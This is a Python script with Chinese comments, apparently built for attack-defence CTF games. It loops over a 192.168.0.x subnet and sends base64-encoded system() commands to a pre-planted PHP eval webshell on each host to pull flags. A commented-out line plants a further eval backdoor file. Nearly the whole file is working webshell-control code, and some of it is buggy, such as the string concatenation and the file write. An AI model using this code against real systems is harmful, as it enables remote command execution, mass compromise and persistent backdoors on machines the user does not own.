import base64
import requests
import re


# url 目标
# flag_url 提交flag的url curl flag_url
# method 木马提交方式
# password 木马密码
# flag_path 后门的路径 例如：shell.php webshell.php

def get_flag(url, flag_url, method, password, flag_path):
    # url=192.168.0.0  flag_path = shell.php real_url=192.168.0.0/shell.php
    real_url = "http://" + url + "/" + flag_path  # 最终webshell路径

    # 执行的命令
    # cmd = 'whoiam'
    # 批量获取flag
    cmd = "curl" + flag_url  # 也可能是cat
    # 批量写入新命令
    # cmd = 'echo ^<^?php ^@eval(^$^_POST[\'aaa\'])^; ^?^> > C:/WWW/css/123/newShell.php'

    # 通过php函数执行的命令
    get_cmd = "echo system(\"%s\"): " % cmd
    """ php
    ccc==@eval(base64_decode($_POST[z0]));
    z0=payload  payload为base64编码
    """
    # 定义一个列表
    data = {
        password: "@eval(base64_decode($_POST[z0]));",
        'z0': base64.b64encode(bytes(get_cmd, encoding='utf-8'))
    }

    try:
        if method == 'get':
            res = get_re(real_url)
            print(res.text)
        elif method == 'post':
            res = post_re(real_url, data)
            match = re.findall("\n\n", res.text)
            if match:
                with open('flag.txt', 'a+') as f:
                    f.write(match)
            print(res.text)

        # 判断响应码
        if res.status_code == 200:
            print(f"[+] {real_url} webshell is Found")
        else:
            print(f"[-] {real_url} wehshell Not Found")
    except requests.RequestException as e:
        print(f"[-] {real_url} connection error: {e}")
        return 0


def get_re(get_url):
    return requests.get(url=get_url, timeout=5)


def post_re(post_url, data):
    return requests.post(url=post_url, data=data, timeout=5)


# 定义参数
"""
Url = "192.168.0."
Flag_url = "http://example.com/submit_flag"
Method = "post"
Password = "aaa"
Flag_path = "shell.php"
"""
Url = input("input your url: ")  # 目标服务器地址
Flag_url = input("input your flag_url: ")  # 提交 Flag 的 URL
Method = input("input your method: ")  # Webshell 的提交方式
Password = input("input your password: ")  # Webshell 的密码
Flag_path = input("input your flag_path: ")  # Webshell 文件路径

for ip in range(0, 255):
    ip = str(ip)
    Url = Url + ip
    # 调用函数
    get_flag(Url, Flag_url, Method, Password, Flag_path)
    Url = "192.168.0."
